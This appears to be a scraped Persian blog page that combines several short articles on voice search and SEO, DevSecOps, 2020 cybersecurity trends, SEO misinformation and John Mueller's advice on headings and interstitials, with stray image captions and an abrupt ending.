750x480 - جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

 اهمیت جستجوی صوتی

جستجوی صوتی و سئو از سال ۲۰۱۶ یکی از بحث برانگیزترین مباحث موجود در جهان جستجوگرها بوده است. به نظر رند فیشکین و نیل پاتل جستجوی صوتی آینده سئو است.  در این مقاله ، توضیح می دهم که چرا جستجوی صوتی در طولانی مدت اهمیت دارد و چگونه می توانید از آن بهره ببرید.

وضعیت جستجوی صوتی در سال ۲۰۱۷

جستجوی صوتی روز به روز در حال پیشرفت است. طبق یک مطالعه تحقیقاتی Northstar ، بیش از ۵۰ درصد از نوجوانان آمریکایی و ۴۱ درصد از بزرگسالان ایالات متحده از جستجوی صوتی استفاده می کنند. طبق گفته گوگل ، بیش از ۲۰ درصد از کل جستجوهای تلفن همراه جستجوهای صوتی است.

در حالی که آمارها نشان می دهد که جستجوی صوتی به سرعت در حال رشد است (به طور خاص ، با استفاده از دستگاه های خانگی هوشمند مانند Google Home و Amazon Echo) ، هنوز در مراحل اولیه نوآوری و تصویب قرار دارد. همه ما می دانیم که مردم عمدتا از جستجوی صوتی برای جستجوی محتوا و اطلاعات محلی استفاده می کنند.


بیشتر بخوانید >> نحوه جلوگیری از اطلاعات غلط SEO


جستجوی صوتی مبتنی بر عمل است و با جستجوهای وب و موبایل متفاوت است. جستجوهای صوتی دستگاه خانگی هوشمند با درخواستهای دستیاران تلفن هوشمند مانند Siri ، Cortana ، Google Assistant و غیره متفاوت است.

 Google داده های جستجوی صوتی جداگانه را هنوز ارائه نداده است. از آنجا که بازاریابان نمی دانند که در واقع چه تعداد از مردم از جستجوی صوتی برای پیدا کردن و پیمایش وب سایت آن ها استفاده می کنند ، مجبورند با فرضیات کار کنند و با گزینه های محدود بازاریابی سر و کار داشته باشند.

گفته می شود ، بهینه سازی وب سایت شما برای جستجوی صوتی آسان نخواهد بود و ممکن است نیاز به جستجو جدی باشد ، اما کاملاً ارزش آن را دارد.

چرا جستجوی صوتی اهمیت دارد

 باید  دلایل زیر برای سرمایه گذاری در جستجوی صوتی را در نظر بگیرید:

  • جستجوی صوتی آسان و راحت است. سؤال از تلفن هوشمند خود برای یافتن نزدیکترین مکان پیتزا و یا هر سوال دیگری که دارید بسیار راحت تر است. به جای تایپ کردن سؤال خود در صفحه کوچک ، فقط آنچه را می خواهید پیدا کنید را با جستجوی صوتی جستجو کنید.
  • کاربران جوانتر ‘جستجوی صوتی ‘ را به دلیل راحت تر بودن بیشتر ترجیح میدهند. برخلاف بزرگسالان ، افراد جوان و نوجوان مشکلی برای صحبت با دستگاه های خود به صورت خصوصی و عمومی ندارند.
  • شما  با جستجوی صوتی نتایج بهینه سازی بهتر و با کیفیت کسب می کنید. 
  • امکان سئو بدون SERP. جستجوی صوتی هنوز در مراحل ابتدایی خود است ، اما واضح است که تعداد بیشتری از افراد در آینده به طور فعال از آن استفاده خواهند کرد – تا حدی که نتایج مبتنی بر SERP ممکن است در کل ناپدید شوند. طبق پیش بینی گوگل ، فروش جهانی دستگاه های دستیار صوتی دیجیتال تا سال ۲۰۲۰ به ۱۵٫۱ میلیون خواهد رسید.

q - جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

این به این معنی است که متخصصان سئو باید سریعاً برای سازگاری با قوانین جدید جستجو اقدام کنند و بهینه سازی جستجوی صوتی را به عنوان بخشی اصلی کار خود قرار دهند در غیر این صورت ، آنها خطر از دست دادن تعداد قابل توجهی از مخاطبان خود را دارند.

چگونه می توان در جستجوی صوتی و سئو برتری یافت

بهینه سازی جستجوی صوتی یک بخش مهم کشف نشده SEO است. گرچه گوگل دستورالعمل های جستجوی صوتی خود را در دسامبر سال ۲۰۱۷ منتشر کرد ، اما اکثر سوالات هنوز بدون جواب مانده اند. با این حال ، استفاده از نکات بهینه سازی زیر مهم است:

۱) لیست ‘Google Business’ خود را ایجاد کنید

با قرار دادم نام شرکت خود در Google My Business  ، اطلاعات مفیدی را (مانند طبقه کسب و کار ، آدرس فیزیکی ، شماره تلفن ، ساعات کار و غیره) به Google میدهید، که به طور طبیعی شانس حضور سایت شما در جستجوی صوتی را افزایش می دهد.

البته ، فقط تنظیم یک لیست Google My Business ، هیچ تضمینی در این زمینه ندارد. شما باید آن را بهینه کنید تا به Google کمک کنید اطلاعات صحیح را بداند. اگر لیست شما به روز شده و به درستی بهینه شده باشد ، Google احتمالاً آن را برای داده های جستجوی صوتی محلی مرتبط نشان می دهد.

۲) از الگوهای گفتار طبیعی استفاده کنید

Hoonarjo 2 - جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

منظور من این است که شما باید استراتژی کلمات کلیدی خود را تغییر دهید. تمرکزکلمات کلیدی را از تطابق دقیق به کلمات کلیدی مفهومی تغییر دهید. 

 کلمات کلیدی شما نه تنها باید در محتوا ظاهر شوند بلکه باید با نحوه صحبت افراد و به ویژه نحوه سؤال آنها یکی باشد ، نحوه ی گفتاری و نوشتاری افراد هنگام جستجوی آنلاین متفاوت است

از آنجا که Google نمایش داده های جستجوی صوتی را در کنسول جستجوی Google نشان نمی دهد ،شما باید :

  • تمام سؤالاتی را که مردم در مورد شرکت شما می پرسند جمع کنید.
  • آنها را بر اساس دسته بندی ها (مانند محصولات ، خدمات و غیره) تجزیه کنید.
  • دریابید که در مورد چه چیزی مردم بیشترین سؤال را دارند.
  • تجزیه و تحلیل سؤالات ، مستند کردن کلمات کلیدی و عبارات مربوطه که می توانید در محتوای خود استفاده کنید یا صفحات جداگانه را در سؤالات متداول خود بسازید.

uj - جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

۳٫) برای داده های ساخت یافته بهینه سازی کنید

هدف شما در اینجا فراهم کردن زمینه برای موتورهای جستجو است. هرچه آنها وب سایت شما را بهتر تجزیه کنند ، شانس شما برای حذف قسمت هایی از صفحات آن بیشتر خواهد شد. فراموش نکنید که با استفاده از ابزار تست داده های ساختاری ، نشانه گذاری خود را برای خطاها آزمایش کنید.

۴- یک صفحه سؤال متداول ایجاد کنید

صفحات پرسش و پاسخ به شما امکان می دهد بهترین کلمات کلیدی با دم بلند و نشانه گذاری داده های ساخت یافته را به دست آورید.

aw - جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

هدف شما در اینجا این است:

  • محبوب ترین وپرمعنا ترین سؤالات را در یک صفحه قرار دهید.
  • به موتورهای جستجو اطلاع دهید که این صفحه با پیاده سازی طرح QAPage یک صفحه پرسش و پاسخ است.
  • با اجرای طرح های پرسش و پاسخ ، قسمت محتوای جداگانه برای هر سوال و پاسخ ایجاد کنید.
  • اگر در مشخص کردن صفحات سایت خود مشکل دارید ، از Helperup Structed Data Markup Helper استفاده کنید

۵- بر سئو موبایل تأکید کنید

تسلط موبایل بر دسک تاپ خبرهای قدیمی است. امروزه ، با نزدیک به ۶۰ درصد از جستجوها از طریق دستگاه های تلفن همراه ، بازاریاب های دیجیتال موبایل را در اولویت قرار میدهند. با این حال ، با پیشرفت جستجوی صوتی ، SEO تلفن همراه از اهمیت بیشتری برخوردار می شود.

تا زمانی که بیشتر جستجوهای صوتی از طریق تلفن های هوشمند انجام می شود ، تأمین موقعیت برتر در Google یک ضرورت محسوب می شود. این بدان معنی است که باید صفحات و محتوای سایت شما بهینه شود تا یکپارچه در هر دستگاه و سیستم عامل کار کند. هرچه بهینه سازی بهتر باشد ، شانس سایت شما برای رتبه بندی در ‘موقعیت صفر’ بالاتر می رود.

adfd - جستجوی صوتی چه اهمیتی دارد و چرا برای سئو مفید است؟

 تست تلفن همراهگوگل ( mobile-friendly test) را انجام دهید تا متوجه شوید وب سایت شما مناسب موبایل است یا خیر. البته ، اطمینان حاصل کنید که همه اشتباهات را در اسرع وقت برطرف کنید تا نتیجه «صفحه سازگار با تلفن همراه» باشد.

نتیجه

گوگل ، آمازون ، اپل و سایر شرکت ها سرمایه گذاری های زیادی را برای دستیاران شخصی انجام می دهند و به ادامه فن آوری جستجوی صوتی علاقه دارند.

افراد شاغل و بازاریاب های دیجیتال باید با این حقیقت اجتناب ناپذیر روبرو شوند: آسان تر و راحت تر از جستجوهای تایپ شده ، جستجوی صوتی است و به احتمال زیاد غالب خواهد شد ، درست همانطور که جستجوی تلفن همراه به تدریج از جستجوی دسک تاپ پیشی گرفت.

 این مهم است که ما به جستجوی صوتی و جستجوگرها توجه داشته باشیم. هرچه زودتر این کار را انجام دهیم ، بهتر خواهیم شد – زیرا جستجوی صوتی معامله بزرگ جدیدی است.

750x480 - DevSecOps چیست و چه کاربردی دارد؟

DevSecOps چیست و چه کاربردی دارد؟

تعریف و کاربرد DevSecOps

DevSecOps فقط مربوط به تیم های توسعه و عملیات نیست. اگر می خواهید از چابکی و پاسخگو بودن یک رویکرد DevOps نهایت استفاده را ببرید ، امنیت فناوری اطلاعات نیز باید دربرنامه های زندگی  شما نقش یکپارچه ای داشته باشد.

DevSecOps یعنی اینکه از اول کاردرباره برنامه های کاربردی و امنیت فکر کنید و زیرساختی مناسب برای آن ها ایجاد کنید. این همچنین به معنای خودکار سازی برخی از دروازه های امنیتی برای کاهش سرعت کار DevOps است. انتخاب ابزار مناسب برای ادغام مداوم امنیت ، مانند توافق بر سر یک محیط توسعه یکپارچه (IDE) با ویژگی های امنیتی ، می تواند به تحقق این اهداف کمک کند. با این حال ، امنیت DevOps مؤثر به ابزارهای جدید بیشتری احتیاج دارد – این کار بر روی تغییرات فرهنگی DevOps بنا شده تا کار تیم های امنیتی را زودتر ادغام کند.

حفظ امنیت برنامه برای افزایش عمر آن بسیار مهم است. DevSecOps در مورد امنیت داخلی است ، نه امنیتی که برای محیط اطراف برنامه ها و داده ها اشتفاده میشود.

.jpg - DevSecOps چیست و چه کاربردی دارد؟

واقعاً امنیت داخلی چیست؟ برای مبتدیان ، یک استراتژی خوب DevSecOps تعیین میزان تحمل ریسک و انجام تجزیه و تحلیل ریسک و سود است. چه مقدار از کنترل های امنیتی در یک برنامه خاص لازم است؟ اتوماسیون کارهای تکراری برای DevSecOps بسیار مهم است ، زیرا اجرای چک های امنیتی دستی می تواند زمان زیادی طول بکشد.


برای کسب اطلاعات بیشتر در مورد امنیت میتوانید مقاله روبه رو را مطالعه کنید >> ۵ روند برتر امنیت سایبری که باید در سال ۲۰۲۰ آماده شوید


امنیت DevOps به صورت خودکار است

 انجام این کاربا حفظ چرخه های توسعه کوتاه و مکرر ، ادغام اقدامات امنیتی با حداقل اختلال در عملیات ، پیگیری فن آوری های نوآورانه مانند میکروسرویس ها و در عین حال همکاری نزدیک تر بین تیم های معمولی جدا شده, با صندوق های ظریف و همکاری در سازمان  آغاز می شود ، و تسهیل کننده این تغییرات انسانی در یک چارچوب DevSecOps اتوماسیون است.

اما اتوماسیون چیست و چگونه است؟ سازمانها باید قدم بردارند و کل محیط توسعه و عملیات را در نظر بگیرند. این شامل مخازن کنترل منبع ، یکپارچه سازی مداوم و استقرار مداوم (CI / CD)، مدیریت رابط برنامه نویسی  (API) ، اتوماسیون ارکستراسیون و رهاسازی و مدیریت عملیاتی و نظارت است.

فن آوری های جدید اتوماسیون به سازمان ها کمک کرده تا شیوه های توسعه سریع تر را به پیش ببرند ، و همچنین در پیشبرد اقدامات امنیتی جدید نقش داشته اند. اما اتوماسیون تنها چیز در فناوری اطلاعاتی نیست که در سالهای اخیر تغییر یافته است – فناوری های بومی بزرگ مانند میکروسرویس ها اکنون بخش عمده ای از اکثر ابتکارات DevOps هستند و امنیت DevOps باید با آنها مطابقت داشته باشد.

.jpg - DevSecOps چیست و چه کاربردی دارد؟

امنیت DevOps برای میکرو سرویس ها ساخته شده است

DevSecOps به معنای ایجاد امنیت از توسعه برنامه تا انتها است. این ادغام به همان اندازه که به ابزارهای جدیدی نیاز دارد ، به یک ذهنیت سازمانی جدید هم نیاز دارد. با توجه به این نکته ، تیم های DevOps باید امنیت خود را برای محافظت از محیط و داده های کلی و همچنین ادغام مداوم  به طور خودکار بکار گیرند 

امنیت محیط و داده ها:

  • استاندارد سازی و خودکار سازی محیط.
    هر سرویس باید از حداقل امتیاز ممکن برای به حداقل رساندن اتصالات و دسترسی غیرمجاز برخوردار باشد.
  • هویت کاربر و قابلیت کنترل دسترسی را متمرکز کنید.
    کنترل دسترسی دقیق و مکانیسم های تأیید متمرکز برای تأمین امنیت خدمات ضروری  است ، زیرا تأیید اعتبار در نقاط مختلفی آغاز می شود.
  • رمزگذاری داده ها بین برنامه ها و خدمات.
    یک سکوی ارکسترسیون کانتینر با ویژگی های امنیتی یکپارچه کمک می کند تا احتمال دسترسی غیرمجاز به حداقل برسد.
  • دروازه های API ایمن را معرفی کنید.
    API های ایمن باعث افزایش مجوز و دید مسیریابی می شوند. با کاهش API در معرض ، سازمانها می توانند سطح حملات را کاهش دهند.

.jpg - DevSecOps چیست و چه کاربردی دارد؟

امنیت فرآیند CI / CD:

  • اسکنرهای امنیتی ظروف را ادغام کنید.
    این باید بخشی از روند اضافه کردن ظروف به رجیستری باشد.
  • تست امنیت در فرآیند CI را خودکار کنید.
    این شامل اجرای ابزارهای آنالیز استاتیک امنیتی به عنوان بخشی از ساخت و همچنین اسکن تصاویر کانتینر از پیش ساخته برای آسیب پذیریهای امنیتی شناخته شده است.
  • تست های خودکار را برای قابلیت های امنیتی به فرایند آزمون پذیرش اضافه کنید.
    تست های اعتبار سنجی ورودی خودکار ، و همچنین تأیید صحت و ویژگی های مجوز.
  • به روزرسانی های امنیتی  را خودکار کنید.
    این کار را از طریق  DevOps انجام دهید. 
  • قابلیت های مدیریت پیکربندی سیستم و خدمات را خودکار کنید.
    این امکان را برای رعایت خط مشی های امنیتی و رفع خطاهای دستی فراهم می آورد. حسابرسی و اصلاح نیز باید به صورت خودکار انجام شود

در این مقاله سعی کردیم تا DevSecOps و کاربرد آن را به طور کامل توضیح دهیم برای یادگیری بیشتر میتوانید ویديو زیر را هم مشاهده کنید

Hoonarjo 2.jpgd  750x480 - 5 روند برتر امنیت سایبری که باید در سال 2020 آماده شوید

۵ روند برتر امنیت سایبری که باید در سال ۲۰۲۰ آماده شوید

امنیت سایبری

 در سال ۲۰۲۰ حملات امنیت سایبری سرعت بیشتری خواهد یافت و تاکتیک ها تکامل خواهند یافت. ما همچنان با حملات بیشتری مواجه خواهیم شد که سالها ما را تهدید کرده اند ، و هنگامی که مشاغل نوآوری های جدید را پذیرفته اند ، در معرض تهدیدات جدید قرار میگیرند.

شما و تیم امنیتی شما بین تهدیدها و داده هایی که برای کسب و کار شما با ارزش تر هستند ، قرار خواهید گرفت. اما شما تنها نخواهید بود ما در این مقاله شما را با فناوری ها ، استراتژی ها و بینش هایی که به رشد کسب و کار شما کمک می کند ، آشنا میکنیم.

ما در این مقاله با بهره گیری کامل از تخصص هایمان انتظار داریم که  در سال آینده شاهد این لیست از روندهای امنیت سایبری باشیم . این سه روند برتر من برای آماده سازی در سال ۲۰۲۰ است:

مشاغل با کمبود دفاع در معرض خطر قرار می گیرند

Hoonarjo 2 - 5 روند برتر امنیت سایبری که باید در سال 2020 آماده شوید

از آنجا که سازمانها تحول های دیجیتالی را پذیرفته اند ، امکان دارند با الزامات متضاد سرعت ، راحتی ، امنیت و ریسک مواجه شوند.

مطابق نظر سنجی ، ‘بیست و سه درصد از سازمان ها می گویند که برای اکثر فن آوری های جدید ، ریسک از مزایای بالقوه تجاری بالاتر است … و ۷۹٪ از پاسخ دهندگان نظرسنجی ، ریسک سایبر را به عنوان یکی از پنج نگرانی برتر تجارت خود رتبه بندی کرده اند. .

خوشبختانه ، کارشناسان امنیتی به بسیاری از مشاغل کمک کرده اند تا ریسک را با استفاده از چارچوب های عمیق دفاعی  که در یک محیط دائمی در حال تغییر است ، کاهش دهند. ما پنج روش برتر را که به سازمان ها کمک می کند تا ریسک خرید را کاهش دهند برای شما آورده ایم ، از جمله:

  • اطمینان از هم ترازی اجرایی
  • برنامه های امن
  • برنامه های خود را بطور پیش فرض ایمن کنید
  • بینش عملی را بدست آورید
  •  اتوماسیون و DevSecOps

در این مقاله ما در مورد تهدیدات امنیتی و فن آوری هایی که باید در سال ۲۰۲۰ با آن ها مقابله کنیم برای شما آورده ایم

حملات خودکار افزایش می یابد

Hoonarjo 2.jpga  - 5 روند برتر امنیت سایبری که باید در سال 2020 آماده شوید

حملات خودکار برای هر مشاغل با حضور آنلاین مشکل است.  هر وب سایت ، برنامه تلفن همراه و API ها شبانه روز توسط ربات ها مورد حمله قرار می گیرند.

 در سال ۲۰۱۹ ، فقط ۵۷٫۸ درصد از ترافیک وب از طریق انسانهای واقعی حاصل شده , بقیه مربوط به رباتها است. در حالی که برخی از رباتها مورد استقبال مشاغل قرار می گیرند (مانند موتورهای جستجو) برخی دیگر خطرناک هستند. ربات های بد ۲۱٫۸ درصد از کل ترافیک وب امروز را تشکیل می دهند و انتظار می رود که در سال ۲۰۲۰ افزایش یابد.


بیشتر بخوانید >> نحوه جلوگیری از اطلاعات غلط SEO


شرکت ها در هر صنعت مورد حمله رباتهای های بد قرار می گیرند ، اما شرکت های تجارت الکترونیکی به ویژه آسیب دیده اند. به همین دلیل ما اولین گزارش مربوط به صنعت را در رباتهای تجارت الکترونیکی توسعه دادیم. در آن ، ما ۱۶٫۴ میلیارد درخواست از ۲۳۱ حوزه بین المللی برای کشف یافته های کلیدی مانند:

  • ۳۰٫۸ درصد از ترافیک به سایت های تجارت الکترونیک ربات ها مطعلق است
  • ۱۷٫۷ درصد از ترافیک به سایت های تجارت الکترونیکی ناشی از ربات های بد مطعلق است
  • ۲۳٫۵ درصد از این ربات های بد طبقه بندی شده اند

تجارت ها به اعتماد صفر عادت خواهند کرد

رابطه اعتماد صفر با امنیت سایبری

اعتماد صفر مفهومی است که در سال ۲۰۱۰ توسط شرکت تحلیلگر Forrester با همکاری مؤسسه ملی استاندارد و فناوری (NIST) معرفی شد. این مبتنی بر چارچوبی از کنترل های دسترسی دقیق است که به طور پیش فرض به کسی اعتماد نمی کند ، حتی آنهایی که قبلاً در محیط شبکه قرار دارند.

براساس بررسی اولویت های امنیتی IDG در سال ۲۰۱۸ ، ‘هفتاد و یک درصد از تصمیم گیرندگان فناوری اطلاعات متمرکز بر امنیت از الگوی اعتماد صفر آگاه هستند و هشت درصد نیز قبلاً فعالانه از آن در سازمان های خود استفاده می کنند ، در حالی که ده درصد دیگر آن راکنترل می کنند. 

در سال ۲۰۲۰ ، من اعتقاد دارم كه وقتی در مورد امنیت داده ها صحبت می كنیم ، در مورد اعتماد صفر نیز صحبت خواهیم كرد. پدافندهای امنیتی منسوخ شده و مبتنی بر محیط به طور کلی به خودیها اعتماد داشتند (دسترسی محدود) به داده های سازمانی دارند و بر محافظت از محیط شبکه از افراد خارجی متمرکز شده اند. امروزه ، محیط متخلخل و غیرقابل توصیف است. اعتماد صفر مدلی را ارائه می دهد که با چشم انداز معاصر فناوری اطلاعات مطابقت داشته باشد ، جایی که تمایز بین خودی و افراد خارجی تا حد زیادی بی ربط است.

 

Hoonarjo 2.jpgغ 750x480 - نحوه جلوگیری از اطلاعات غلط SEO

نحوه جلوگیری از اطلاعات غلط SEO

اطلاعات غلط SEO

اطلاعات خوب زیادی در مورد SEO وجود دارد. اما همچنین اطلاعات کاملاً غلطی نیز وجود دارد. هنگامی که نتایج جستجوی Google اطلاعات بد را تقویت می کند ، کمکی به ما نمی کند

به عنوان مثال ، اخیراً جان مولر توئیت کرد که کلمات کلیدی LSI واقعی نیستند.

اطلاعات غلط SEO

اما گوگل با رتبه بندی اطلاعات غلط سئو در صدر SERP ها پیام خود را واژگون می کند. اگر در Google کلمات کلیدی LSI را جستجو کنید ، یک صفحه وب رتبه یک ادعا می کند که کلید واژه LSI برای SEO مهم است و دو نتیجه جستجو دیگر تولید کنندگان کلید واژه LSI هستند.

بین دیدگاه و بینش مبتنی بر واقعیت تفاوت قائل شوید.

تأیید اینکه آیا نویسنده به یک منبع معتبر ارتباط دارد یا خیر ، مهم است. چیزی مانند جمله Googler ، حق ثبت اختراع یا مقاله تحقیق به بالا بردن نظر در بینش مبتنی بر واقعیت کمک می کند.

هر چیز دیگری فقط یک نظر است و مهم نیست که آیا پایه ای برای حمایت از آن وجود دارد یا نه؟ اینکه چیزی ‘منطقی به نظر برسد’ کافی نیست.

فقط به این دلیل که گوگل چیزی را در صدر نتایج جستجو قرار می دهد ، آن را نیز صحیح نمی کند.

اظهارات گوگل باید متن باشد

Hoonarjo 2.jpgهغ - نحوه جلوگیری از اطلاعات غلط SEO

برخی افراد دستور کار دارند. هنگامی که این اتفاق می افتد ، آنها می خواهند اظهارات گوگلر را خارج از متن استناد کنند تا برنامه های خود را تحت فشار قرار دهند.

دستور کار اصلی شامل ترس و عدم اطمینان به منظور ایجاد مشاغل بیشتر است. این غیرمعمول نیست که بازاریابان جستجو بگویند که گوگل با خود متناقض است.

من می دانم که گوگلر به طرز چشمگیری سازگار است ، به خصوص جان مولر. آنچه متناقض است این است که چگونه برخی از افراد تعبیر خود را تفسیر می کنند.

جان مولر گوگل در پادکست ابراز تاسف کرد که ‘دو سوم آنچه گفته می شود اشتباه است یا از متن نقل نشده است.’

نمونه ای از بینش مبتنی بر واقعیت

در بین بینش های بسیاری که راهنمایی رسمی Google درباره بروزرسانی ها می گوید ، ای نوجود دارد:

‘… تغییرات مربوط به بهبود چگونگی ارزیابی سیستم ها به طور کلی محتوا است. این تغییرات ممکن است باعث شود برخی صفحات که قبلاً کمتر پاداش می گرفتند ، بهتر عمل کنند. ‘

این بیانیه رسمی است که یکی از دلایلی که یک سایت می تواند موقعیت های جستجو را از دست ندهد باین است که سایت های دیگر ‘کم ارزش’ هستند.

بیشتربخوانید >>‌ سرور Origin چیست؟ 

اکنون دلیلی وجود دارد که تأیید نشده است. دلیل دیگر می تواند  این باشد که در واقع محتوای آن صحیح نیست.

هیچ کس در مورد الگوریتمهای مربوط به این موضوع بحث نکرده است. هیچ گوگلری تأیید نکرده است که الگوریتم بررسی واقعیت است. جامعه سئو این احساس را دارد که بررسی واقعیت در حال انجام است.

آیا مبنایی برای این ایده وجود دارد که گوگل در حال بررسی واقعیت است؟ بله ، وجود دارد

آنچه را می خوانید بررسی کنید

Hoonarjo 2.jpgثس - نحوه جلوگیری از اطلاعات غلط SEO

 در یک Hangout Webmaster ، همیشه کلیپ ویدیویی استناد شده را خودتان تماشا کنید. با تماشای آن می توانید خودتان  تعیین کنید که آیا مطلبی که خوانده اید صحیح است یا نه؟

مطالعات همبستگی قابل اعتماد نیستند

مقالات دارای داده های همبستگی توجه زیادی را به خود جلب می کنند. داده های به دست آمده از مطالعه میلیون ها نتیجه جستجو ، الگوهای را نشان می دهند. این غیرقابل انکار است که الگوهایی نشان داده می شوند.

اما الگوهای بی معنی هستند  به عنوان مثال ، اگر استخراج کنیم که درصد XX از سه رتبه برتر در وردپرس منتشر شود ، آیا این بدان معنی است که انتشار در وردپرس به رتبه بندی کمک می کند؟ نه اینطور نیست.

همبستگی ها بی معنی هستند. همبستگی های بی معنی تمام وقت اتفاق می افتد واین یک هنجار است. انتساب معنی در جایی که معنای اثبات نشده وجود دارد ، اشتباه است.

یک مطالعه همبستگی SERPs که به طور معمول از چندین جستجو تشکیل شده است ، اطلاعات مفیدی درباره الگوریتم های یادگیری AI / Machine امروز نشان نمی دهد.

به نظر من مقالات مبتنی بر همبستگی ، کلیک بزرگ هستند اما عموما هیچ فایده ای برای درک عوامل رتبه بندی ندارند. مقالات سئو مبتنی بر همبستگی به طور مداوم به نتیجه نادرست از آنچه باعث اثر شده است می رسند.

۱٫ داده ها بصورت انضمامی و غیرقابل انکار است.
۲٫ تفسیر داده ها روان و قابل انکار است.

اگر برخی تحقیقات ، اختراعات ثبت شده یا عبارت Googler وجود داشته باشد که نشان می دهد تحقیق شده است ، نتیجه احتمال صحت بیشتر دارد.  حدس زدن پایه ای ضعیف برای ایجاد استراتژی تجاری است.

اثبات از طریق استناد (تحقیق ، ثبت اختراع یا بیانیه گوگلر) نشان می دهد که یک ایده حداقل ممکن یا واقعی است.

هیچ کس نمی تواند با اطمینان بگوید X باعث Y شده زیرا آنچه در بین X و Y اتفاق می افتد در جعبه سیاه به اصطلاح Google اتفاق می افتد که در آن هیچ کس نمی تواند ببیند چه اتفاقی می افتد.

منبع

Hoonarjo 2.jpgیظ 750x480 - 2 نکته برای بهبود محتوای وب

۲ نکته برای بهبود محتوای وب

بهبود تمرکز محتوا صفحه وب

از جان موئلر Google در یک Hangout Webmaster درباره بهبود تمرکز محتوا ی صفحه وب سؤال شد. مولر دو نکته در مورد چگونگی انجام این کار به اشتراک گذاشت.

چگونه تمرکز محتوا را بهبود بخشیم؟

این سؤال در مورد صفحات توضیحات محصول با نمایه ضعیف (PDP) پرسیده شد. ناشر پرسید که برجسته تر ساختن مطالب کمک می کند یا خیر؟

‘آیا فکر می کنید پایین آوردن تصاویر به پایین و متن مربوطه به گوگل کمک می کند تا تمرکز هر یک از این صفحه ها را بهتر تفسیر کند؟’

در کمال تعجب ، جان مولر پاسخ داد: نه ، اینگونه نیست که تمرکز محتوا را بهبود ببخشد.

سپس توضیح داد که چرا: ‘بنابراین فقط مکان محتوا را در صفحه HTML تغییر دهید. من فکر نمی کنم که به هیچ وجه نقش بزرگی داشته باشد.’

نکته محتوای شماره ۱: استفاده صحیح از عناوین:

عناوین لیست های کلیدی نیستند

تصور غلط رایج در مورد عناوین (H1 ، H2 ، و غیره) این است که آنها به عنوان عوامل رتبه بندی مهم هستند. به همین دلیل ، یک خطای رایج ایجاد شده توسط SEO و ناشران استفاده از عناوین به عنوان مکانی برای اضافه کردن کلمات کلیدی مهمی است که می خواهند صفحه برای آن رتبه بندی شود.

Hoonarjo 2.jpgیث - 2 نکته برای بهبود محتوای وب

در اصل ، جستجوگرها در سال ۲۰۰۱ و حتی امروز عناصر عنوان را به عنوان لیست آرزوها برای تمام کلمات کلیدی مورد نظر برای رتبه بندی استفاده می کنند. این روش قبلاً راهی برای رتبه بندی صفحه در سال ۲۰۰۱ و در آنجا بود.

موتورهای جستجو مدرن از عناوین استفاده کرده اند

نحوه استفاده Google از برچسب های عنوان در طی سالها چندین بار تکامل یافته است. امروز ، برچسب های عنوان مهم هستند اما به عنوان راهی برای گفتن به Google برای کلمات کلیدی که می خواهید برای آنها رتبه بندی کنید مهم نیست.

بیشتربخوانید >>‌ سرور Origin چیست؟ 

چه عناوینی برای آنها مفید است

برچسب های عنوان برای نشان دادن آنچه در یک بخش از محتوا است مفید هستند. یک صفحه وب در مورد یک موضوع است. در یک صفحه وب که به خوبی ساخته شده است ، هر بخش از یک صفحه وب در مورد موضوع فرعی آن صفحه وب است.

بنابراین هنگامی که کاربر در مورد یک محصول از Google سؤال می کند ، اطلاعاتی که در صفحه شما آورده شده ممکن است شامل تصاویر مربوط به محصول ، قیمت گذاری ، اندازه ، رنگ ، بررسی و مقایسه باشد.

اگر صفحه شما آموزنده است ، نیاز اطلاعاتی به یک صفحه از محتوا می تواند مفید بودن ابزارها برای دستیابی به یک هدف باشد (مانند صفحه مناسب برای دستور العمل) یا سایر اطلاعات تکمیلی که نیازهای کاربران را برآورده می کند.

Hoonarjo 2.jpgفق - 2 نکته برای بهبود محتوای وب

برچسب های عنوان همان چیزی است که آنچه در آن صفحه یک صفحه وب است را تعریف و توصیف می کند. این همیشه همان چیزی بود که سرفصل ها برای آن بود. جامعه سئو به سادگی از آنها ضعیف استفاده کرده است.

جان مولر در مورد استفاده صحیح از عناوین:

‘عناوین از این جهت مفید هستند که می توانیم عنوانی بگیریم و ببینیم که کدام تصاویر و کدام متن برای آن عنوان استفاده می شود.’

از پاسخ مولر مشخص است که در صفحه برنامه ریزی شده مطالب ، عنوان ، تصاویر و متن واحدی را تشکیل می دهند که هر یک به یکدیگر مربوط می شوند.

سرفصل هایی که به طور مستقیم به محتوا مربوط نمی شوند یک اشتباه معمول است. این چیزی است که گاهی اوقات منجر به پایین تر شدن صفحات وب می شود.

سپس جان مولر تکرار کرد که چگونه حرکت متن به اطراف برای برجسته تر کردن آن در تصاویر کمک نمی کند تا محتوای به صورت صحیح فهرست بندی شود:

‘اما فقط با تغییر HTML یا CSS ، همه چیز را نمی بینم. بنابراین در این رابطه ، من واقعاً نگران این موضوع نیستم. ‘

نکته شماره ۲ بینابین ها می توانند نمایه سازی را مسدود کنند

این قسمت بعدی جالب است. به گفته مولر ، یک بینابینی مستقر و نامناسب ممکن است در نمایه سازی محتوا دخالت کند. مولر از این سایت بازدید کرده بود و یک انتخاب بینابینی را برای انتخاب کشوری مشاهده کرده بود که ممکن است Google را از فهرست بندی درست محتوا مسدود کند.

Hoonarjo 2.jpgزطز - 2 نکته برای بهبود محتوای وب

وی گفت: ‘یک مورد که هنگام مشاهده آن صفحه به عنوان مثال که به آن پیوند می دهید متوجه شدم این است که وقتی بار می گیرم ، بعد از مدت زمان مشخصی به … بینابینی کشور انتخاب می شود. من نمی دانم که چگونه شما این کار را انجام می دهید و اگر در همه مکان ها این کار را انجام می دهید ، اما به عنوان مثال اگر وقتی Googlebot خزید و صفحات خود را مرتب کرد ، این کار را انجام دادید که ممکن است باعث شود Googlebot نتواند صفحات خود را به درستی ایندکس کند .

بنابراین این یک مورد است که شما می توانید آن را دوباره بررسی کنید. ‘ جان مولر در ادامه توصیه کرد که برای ترغیب بازدید کنندگان سایت به انتخاب کشور خود ، از یک بنر یا سایر رابط کاربری استفاده کنید.

به گفته مولر:

